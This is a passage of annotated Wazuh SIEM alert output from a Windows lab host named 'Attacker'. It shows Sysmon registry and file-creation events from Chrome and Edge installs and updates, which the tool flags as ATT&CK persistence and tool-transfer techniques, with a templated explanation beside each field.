data.win.eventdata.creationUtcTime: 2025-04-20 01:41:01.943 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.601600 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3160671Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225933 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.315
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.315 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.605893 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3543878Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225936 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.351
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.351 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\" Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.610121 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3671970Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225940 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.364
ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath
Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.96\elevation_service.exe"
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534062.613301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.6190305Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225972 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:13.600
ProcessGuid: {94294ddc-50b9-6804-bf08-000000000e00}
ProcessId: 10860
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe
TargetFilename: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
CreationUtcTime: 2025-04-12 15:52:55.107
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50b9-6804-bf08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-12 15:52:55.107 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534067.616369 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:49.4998048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 227426 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:49.499
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:49.499 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
